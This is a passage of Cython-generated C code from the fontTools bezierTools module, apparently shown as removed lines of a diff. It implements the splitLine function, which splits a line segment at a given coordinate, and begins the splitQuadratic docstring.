If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two line segments (each line segment being two 2D tuples)\n if the line was successfully split, or a list containing the original\n line.\n\n Example::\n\n >>> printSegments(splitLine((0, 0), (100, 100), 50, True))\n ((0, 0), (50, 50))\n ((50, 50), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 100, True))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, True))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, False))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((100, 0), (0, 0), 50, False))\n ((100, 0), (50, 0))\n ((50, 0), (0, 0))\n >>> printSegments(splitLine((0, 100), (0, 0), 50, True))\n ((0, 100), (0, 50))\n ((0, 50), (0, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_25splitLine = {"splitLine", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_24splitLine}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitLine (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - 
__pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 1); __PYX_ERR(0, 450, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 2); __PYX_ERR(0, 450, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, 
__pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 3); __PYX_ERR(0, 450, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitLine") < 0)) __PYX_ERR(0, 450, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_where = values[2]; - __pyx_v_isHorizontal = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 450, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitLine", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_pt1x = NULL; - PyObject *__pyx_v_pt1y = NULL; - PyObject *__pyx_v_pt2x = NULL; - PyObject *__pyx_v_pt2y = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_t = NULL; - PyObject *__pyx_v_midPt = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitLine", 1); - - /* "fontTools/misc/bezierTools.py":486 - * ((0, 50), (0, 0)) - * """ - * pt1x, pt1y = pt1 # <<<<<<<<<<<<<< - * pt2x, pt2y = pt2 - * - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 486, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); 
- #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 486, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 486, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_pt1x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_pt1y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":487 - * """ - * pt1x, pt1y = pt1 - * pt2x, pt2y = pt2 # <<<<<<<<<<<<<< - * - * ax = pt2x - pt1x - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 487, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 487, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 487, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 487, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 487, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 487, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_pt2x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_pt2y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":489 - * pt2x, pt2y = pt2 - * - * ax = pt2x - pt1x # <<<<<<<<<<<<<< - * ay = pt2y - pt1y - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_pt2x, __pyx_v_pt1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 489, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":490 - * - * ax = pt2x - pt1x - * ay = pt2y - pt1y # <<<<<<<<<<<<<< - * - * bx = pt1x - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_pt2y, __pyx_v_pt1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 490, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":492 - * ay = pt2y - pt1y - * - * bx = pt1x # <<<<<<<<<<<<<< - * by = pt1y - * - */ - __Pyx_INCREF(__pyx_v_pt1x); - __pyx_v_bx = __pyx_v_pt1x; - - 
/* "fontTools/misc/bezierTools.py":493 - * - * bx = pt1x - * by = pt1y # <<<<<<<<<<<<<< - * - * a = (ax, ay)[isHorizontal] - */ - __Pyx_INCREF(__pyx_v_pt1y); - __pyx_v_by = __pyx_v_pt1y; - - /* "fontTools/misc/bezierTools.py":495 - * by = pt1y - * - * a = (ax, ay)[isHorizontal] # <<<<<<<<<<<<<< - * - * if a == 0: - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 495, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_ax)) __PYX_ERR(0, 495, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_ay)) __PYX_ERR(0, 495, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 495, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":497 - * a = (ax, ay)[isHorizontal] - * - * if a == 0: # <<<<<<<<<<<<<< - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - */ - __pyx_t_5 = (__Pyx_PyInt_BoolEqObjC(__pyx_v_a, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 497, __pyx_L1_error) - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":498 - * - * if a == 0: - * return [(pt1, pt2)] # <<<<<<<<<<<<<< - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 498, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_pt1)) __PYX_ERR(0, 498, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_pt2)) __PYX_ERR(0, 498, __pyx_L1_error); - __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 
498, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 498, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":497 - * a = (ax, ay)[isHorizontal] - * - * if a == 0: # <<<<<<<<<<<<<< - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - */ - } - - /* "fontTools/misc/bezierTools.py":499 - * if a == 0: - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a # <<<<<<<<<<<<<< - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_bx)) __PYX_ERR(0, 499, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_by)) __PYX_ERR(0, 499, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_v_where, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_a); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_t = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":500 - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: # <<<<<<<<<<<<<< - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] - */ - __pyx_t_2 = PyObject_RichCompare(__pyx_int_0, __pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_2); if 
(unlikely(!__pyx_t_2)) __PYX_ERR(0, 500, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_2)) { - __Pyx_DECREF(__pyx_t_2); - __pyx_t_2 = PyObject_RichCompare(__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 500, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 500, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":501 - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by # <<<<<<<<<<<<<< - * return [(pt1, midPt), (midPt, pt2)] - * else: - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 501, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_3)) __PYX_ERR(0, 501, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_v_midPt = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":502 - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] # <<<<<<<<<<<<<< - * else: - * return [(pt1, pt2)] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = 
PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_pt1)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_midPt); - __Pyx_GIVEREF(__pyx_v_midPt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_midPt)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_midPt); - __Pyx_GIVEREF(__pyx_v_midPt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_midPt)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_pt2)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":500 - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: # <<<<<<<<<<<<<< - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] - */ - } - - /* "fontTools/misc/bezierTools.py":504 - * return [(pt1, midPt), (midPt, pt2)] - * else: - * return [(pt1, pt2)] # <<<<<<<<<<<<<< - * - * - */ - /*else*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 504, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 504, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - 
__Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 504, __pyx_L1_error); - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 504, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 504, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitLine", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_pt1x); - __Pyx_XDECREF(__pyx_v_pt1y); - __Pyx_XDECREF(__pyx_v_pt2x); - __Pyx_XDECREF(__pyx_v_pt2y); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_t); - __Pyx_XDECREF(__pyx_v_midPt); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_26splitQuadratic, "splitQuadratic(pt1, pt2, pt3, where, isHorizontal)\nSplit a quadratic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being three 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 150, False))\n ((0, 0), (50, 100), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, False))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, False))\n ((0, 0), 